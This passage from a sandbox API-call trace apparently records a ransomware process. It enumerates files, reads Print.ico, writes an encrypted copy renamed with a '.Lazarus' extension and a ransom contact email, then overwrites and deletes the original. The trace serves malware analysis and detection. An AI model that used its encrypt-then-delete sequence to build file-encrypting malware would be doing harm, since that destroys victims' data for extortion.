Size=0x40) returned 0x533b8 [0074.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a98 [0074.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.407] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78310 [0074.408] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.408] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Print.ico", cAlternateFileName="")) returned 1 [0074.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0074.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0074.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0074.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0074.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0074.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0074.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0074.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0074.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0074.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0074.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0074.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0074.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0074.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.409] AreFileApisANSI () returned 1 [0074.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Print.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Print.ico", lpUsedDefaultChar=0x0) returned 41 [0074.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0074.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0074.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0074.410] AreFileApisANSI () returned 1 [0074.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0074.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67900 [0074.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 41 [0074.410] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.410] GetFileType (hFile=0x410) returned 0x1 [0074.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0074.410] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0074.410] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0074.410] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0074.410] CloseHandle (hObject=0x410) returned 1 [0074.411] AreFileApisANSI () returned 1 [0074.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0074.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67a20 [0074.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x67a20, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 41 [0074.411] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.411] GetFileType (hFile=0x410) returned 0x1 [0074.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67a20 | out: hHeap=0x20000) returned 1 [0074.411] CloseHandle (hObject=0x410) returned 1 [0074.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0074.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0074.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0074.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0074.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0074.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0074.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0074.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0074.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0074.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0074.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.412] AreFileApisANSI () returned 1 [0074.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0074.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0074.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 41 [0074.412] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e)) returned 1 [0074.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0074.412] AreFileApisANSI () returned 1 [0074.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0074.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0074.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0074.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0074.413] GetLastError () returned 0x0 [0074.413] SetLastError (dwErrCode=0x0) [0074.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0074.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0074.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0074.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0074.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0074.413] GetLastError () returned 0x0 [0074.413] SetLastError (dwErrCode=0x0) [0074.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0074.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0074.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x690d0 [0074.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0074.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76098 [0074.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0074.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0074.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0074.413] AreFileApisANSI () returned 1 [0074.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 103 [0074.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xce) returned 0x736b0 [0074.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x736b0, cchWideChar=103 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Print.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 103 [0074.414] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.539] GetFileType (hFile=0x410) returned 0x1 [0074.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x736b0 | out: hHeap=0x20000) returned 1 [0074.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0074.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0074.541] AreFileApisANSI () returned 1 [0074.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0074.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x66f40 [0074.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x66f40, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 41 [0074.541] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.542] GetFileType (hFile=0x42c) returned 0x1 [0074.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x66f40 | out: hHeap=0x20000) returned 1 [0074.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0074.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.542] GetLastError () returned 0x0 [0074.543] SetLastError (dwErrCode=0x0) [0074.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.543] GetLastError () returned 0x0 [0074.543] SetLastError (dwErrCode=0x0) [0074.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0074.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0074.544] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x47e, lpOverlapped=0x0) returned 1 [0074.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0074.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0074.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x91458 [0074.548] GetLastError () returned 0x0 [0074.548] SetLastError (dwErrCode=0x0) [0074.548] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0074.548] GetLastError () returned 0x0 [0074.548] SetLastError (dwErrCode=0x0) [0074.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d780 [0074.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0074.549] GetLastError () returned 0x0 [0074.549] SetLastError (dwErrCode=0x0) [0074.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0074.549] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327ef70*=0x480, lpOverlapped=0x0) returned 1 [0074.550] GetLastError () returned 0x0 [0074.550] SetLastError (dwErrCode=0x0) [0074.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d780 | out: hHeap=0x20000) returned 1 [0074.550] GetLastError () returned 0x0 [0074.550] SetLastError (dwErrCode=0x0) [0074.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0074.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0074.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0074.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0074.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x91458 | out: hHeap=0x20000) returned 1 [0074.550] CloseHandle (hObject=0x410) returned 1 [0074.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0074.552] CloseHandle (hObject=0x42c) returned 1 [0074.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0074.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0074.552] AreFileApisANSI () returned 1 [0074.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0074.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0074.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 41 [0074.552] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.553] GetFileType (hFile=0x42c) returned 0x1 [0074.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0074.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0074.553] GetLastError () returned 0xb7 [0074.553] SetLastError (dwErrCode=0xb7) [0074.553] WriteFile (in: hFile=0x42c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0074.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0074.554] CloseHandle (hObject=0x42c) returned 1 [0074.555] AreFileApisANSI () returned 1 [0074.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0074.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67900 [0074.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 41 [0074.555] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico")) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 